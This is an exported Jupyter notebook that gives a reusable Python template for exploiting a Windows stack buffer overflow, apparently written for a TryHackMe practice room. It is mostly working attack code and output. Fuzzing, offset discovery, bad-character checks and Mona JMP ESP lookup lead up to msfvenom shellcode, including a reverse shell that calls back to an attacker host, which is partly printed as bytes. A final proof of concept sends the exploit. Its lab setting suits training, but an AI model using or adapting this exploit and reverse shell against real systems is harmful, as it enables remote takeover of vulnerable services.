# Stack Buffer Overflow

Code based on https://github.com/justinsteven/dostackbufferoverflowgood

Tested on https://tryhackme.com/room/bufferoverflowprep

Interesting aspects:

    - All the code is in one file, no need to have a new quasi-identical script for each step
    
    - Demonstrating the use of Python 3
    
    - Running bash commands within the notebook using %%bash, using input from Python variables, and saving the output into Python variables
    
    - Notes such as Mona commands can be integrated within the notebook

In the cell below, we have the constants and functions that will be used for each step, as well as in the final POC.
Adapt the send function to your specific target.

In [1]:
#! /usr/bin/env python3
import socket, struct, time, sys


## Set up IP and port of remote host

RHOST = "10.10.XX.XXX"
RPORT = 1337

# for reverse shell
LHOST = "10.6.XXX.XXX"
LPORT = 443


    
# Send function used in each step
def send(string):
    print ("Sending %s bytes" % len(string))
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT))
    
    s.recv(1024)
    s.send(b"OVERFLOW1 " + string + b"\r\n")
    data = s.recv(1024)
    print ("Sent: {0}".format(string))
    print ("Received: {0}".format(data))
    
    s.close()
    
# build string with correct positions of EIP and ESP    
def make_string(EIP,ESP,tot_len,offset_eip, extra_padding=b''):
    string= b""
    string+= b"A"* (offset_eip - len(string))   # padding
    string+= EIP                            # SRP/EIP overwrite
    string+= extra_padding                  # extra padding between EIP and ESP if needed
    string += ESP                      # ESP points here
    string+= b"D" * (tot_len - len(string))  # trailing padding
    #string+= b"\n"
    return string


## 0. Test send() function

In [2]:
send(b'aaaaaaaa')

Sending 8 bytes
Sent: b'aaaaaaaa'
Received: b'OVERFLOW1 COMPLETE\n'


In [3]:
send(b'a'*100)

Sending 100 bytes
Sent: b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
Received: b'OVERFLOW1 COMPLETE\n'


## 1. Fuzzing

In [4]:
# create an array of buffers of incremental size and send them
buff=[b"A"]
counter=100

while len(buff) <=30:
    buff.append(b"A"*counter)
    counter=counter+100
    

for string in buff:
    
    try:
        send(string)
    
        time.sleep(1)
        
    except:     
        print("\nCould not connect!")     
        sys.exit() 


Sending 1 bytes
Sent: b'A'
Received: b'OVERFLOW1 COMPLETE\n'
Sending 100 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
Received: b'OVERFLOW1 COMPLETE\n'
Sending 200 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
Received: b'OVERFLOW1 COMPLETE\n'
Sending 300 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
Received: b'OVERFLOW1 COMPLETE\n'
Sending 400 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Sending 1300 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Sending 1900 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ERROR:root:Internal Python error in the inspect module.
Below is the traceback from this internal error.




Could not connect!
Traceback (most recent call last):
  File "<ipython-input-4-7affca3f2ed0>", line 13, in <module>
    send(string)
  File "<ipython-input-1-58b008e1b647>", line 24, in send
    data = s.recv(1024)
KeyboardInterrupt

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/IPython/core/interactiveshell.py", line 3343, in run_code
    exec(code_obj, self.user_global_ns, self.user_ns)
  File "<ipython-input-4-7affca3f2ed0>", line 19, in <module>
    sys.exit()
SystemExit

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/IPython/core/ultratb.py", line 1169, in get_records
    return _fixed_getinnerframes(etb, number_of_lines_of_context, tb_offset)
  File "/usr/lib/python3/dist-packages/IPython/core/ultratb.py", line 316, in wrapped
    return f(*args, **kwargs)
  File "/usr/lib/python3/dist-pac

TypeError: object of type 'NoneType' has no len()


## 2. Replicate crash

### <span style="color:red"> Set up after fuzzing (increase tot_len if more space is needed):</span>

In [5]:
## edit

tot_len = 2400

In [6]:
string= b""
string+= b"A"*tot_len
#string+= b"\n"

send(string)


Sending 2400 bytes


KeyboardInterrupt: 

## 3. Find offset

### Create pattern:
(gets outputted to offset_string)

In [7]:
%%bash -s "$tot_len" --out offset_string
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb  -l $1 



In [8]:
# should work since all bytes are in ascii range here
offset_string = offset_string[:-1].encode("ascii")    #we remove the \n at the end
offset_string

b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh

### Send pattern:

In [9]:

string= b""
string+= offset_string
#string+= b"\n"

send(string)

Sending 2400 bytes


KeyboardInterrupt: 

### <span style="color:red">Copy resulting EIP here </span>

In [10]:
## edit
EIP = '6F43396E'

In [11]:
%%bash -s "$EIP"
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q $1

[*] Exact match at offset 1978


In [12]:
## edit
offset_eip = 1978

### <span style="color:red">^Copy offset value above here^</span>

## 4. Check for EIP/ESP control

In [13]:
#only if extra padding is needed between EIP and ESP
#extra_padding=b'FFFFFFFF'
extra_padding=b''

In [14]:
string = make_string(EIP=b"BBBB",ESP=b"CCCC",tot_len=tot_len,offset_eip=offset_eip,extra_padding=extra_padding)
send(string)

Sending 2400 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

## 5. Bad chars

<span style="color:red">Add them here as we find them:</span>

In [15]:
## edit those two variables as we find the bad chars
badchars = [0x00]             # [0x00,0x0A]
badchars_string = '\\x00'     # e.g. '\\x00\\x0A'   (remember to escape the backslashes)

badchar_test = bytes(c for c in range(256) if c not in badchars)

In [16]:
# send bad chars
string = make_string(EIP=b"BBBB",ESP=badchar_test,tot_len=tot_len,offset_eip=offset_eip,extra_padding=extra_padding)
send(string)

Sending 2400 bytes
Sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### <span style="color:red">Mona</span>

First set working dir for mona:

!mona config -set workingfolder c:\mona



This creates bytearray.bin in working dir:

!mona bytearray -b "\x00"

This finds bad chars (one by one!):

!mona compare -a esp -f c:\mona\bytearray.bin



Possible default working dirs:

C:\Users\admin\AppData\Local\VirtualStore\Program Files\Immunity Inc\Immunity Debugger

C:\Users\IEUser\AppData\Local\VirtualStore\Program Files (x86)\Immunity Inc\Immunity Debugger\


## 6. JMP to ESP pointer

We need to find a pointer to JMP ESP

Run:
!mona jmp -r esp -cpb "\x00\x0A" 
(with all the bad chars)

OR (more reliable)

!mona modules

!mona find -s "\xff\xe4" -m module.exe/dll

<span style="color:red"> Copy pointer from mona: </span>

In [38]:
## edit 

# JMP ESP pointer
ptr_jmp_esp =  0x625011AF

## 7. Pick a shell code to test

Run the section with the desired shellcode

### Breakpoints

In [43]:
# Breakpoints
shellcode = b"\xCC\xCC\xCC\xCC"

### POP CALC

In [42]:
%%bash -s "$badchars_string" --out create_shellcode

/usr/share/metasploit-framework/msfvenom -p windows/exec   \
-f python --var-name shellcode CMD=calc.exe EXITFUNC=thread -b $1

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of python file: 1237 bytes


In [ ]:
print(create_shellcode)
exec(create_shellcode)   #this actually puts the shellcode into the shellcode variable; don't remove##

In [44]:
sub_esp_10 = b"\x83\xec\x10" 
shellcode = sub_esp_10 + shellcode

### REVERSE SHELL

In [55]:
%%bash -s "$badchars_string" "$LHOST" "$LPORT" --out create_shellcode
/usr/share/metasploit-framework/msfvenom -p windows/shell_reverse_tcp LHOST=$2 LPORT=$3 \
-f python EXITFUNC=thread -b $1 --var-name shellcode –e x86/shikata_ga_nai

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Encoding failed due to a bad character (index=315, char=0x65)
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of python file: 1953 bytes


In [56]:
print(create_shellcode)
exec(create_shellcode)    #this actually puts the shellcode into the shellcode variable; don't remove

shellcode =  b""
shellcode += b"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0"
shellcode += b"\x5e\x81\x76\x0e\x1c\xad\xc4\x7d\x83\xee\xfc"
shellcode += b"\xe2\xf4\xe0\x45\x46\x7d\x1c\xad\xa4\xf4\xf9"
shellcode += b"\x9c\x04\x19\x97\xfd\xf4\xf6\x4e\xa1\x4f\x2f"
shellcode += b"\x08\x26\xb6\x55\x13\x1a\x8e\x5b\x2d\x52\x68"
shellcode += b"\x41\x7d\xd1\xc6\x51\x3c\x6c\x0b\x70\x1d\x6a"
shellcode += b"\x26\x8f\x4e\xfa\x4f\x2f\x0c\x26\x8e\x41\x97"
shellcode += b"\xe1\xd5\x05\xff\xe5\xc5\xac\x4d\x26\x9d\x5d"
shellcode += b"\x1d\x7e\x4f\x34\x04\x4e\xfe\x34\x97\x99\x4f"
shellcode += b"\x7c\xca\x9c\x3b\xd1\xdd\x62\xc9\x7c\xdb\x95"
shellcode += b"\x24\x08\xea\xae\xb9\x85\x27\xd0\xe0\x08\xf8"
shellcode += b"\xf5\x4f\x25\x38\xac\x17\x1b\x97\xa1\x8f\xf6"
shellcode += b"\x44\xb1\xc5\xae\x97\xa9\x4f\x7c\xcc\x24\x80"
shellcode += b"\x59\x38\xf6\x9f\x1c\x45\xf7\x95\x82\xfc\xf2"
shellcode += b"\x9b\x27\x97\xbf\x2f\xf0\x41\xc5\xf7\x4f\x1c"
shellcode += b"\xad\xac\x0a\x6f\x9f\x9b\x29\x74\xe1\xb3\x5b"
shellco

In [57]:
#sub_esp_10 = b"\x83\xec\x10" 
#shellcode = sub_esp_10 + shellcode

In [58]:
#Alternative

nop_sled = b"\x90"*20
shellcode = nop_sled + shellcode

### RUN SHELL CODE

In [59]:
EIP =  struct.pack("<I", ptr_jmp_esp)  
string = make_string(EIP,ESP=shellcode,tot_len=tot_len,offset_eip=offset_eip,extra_padding=extra_padding)
send(string)

Sending 2400 bytes


KeyboardInterrupt: 

In [45]:
string

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

## Final Code (POC)

### Combine the following:

cell that starts with

#! /usr/bin/env python3




tot_len,offset_eip,extra_padding,ptr_jmp_esp

actual shellcode

In [ ]:
EIP =  struct.pack("<I", ptr_jmp_esp)  
string = make_string(EIP,ESP=shellcode,tot_len=tot_len,offset_eip=offset_eip,extra_padding=extra_padding)
send(string)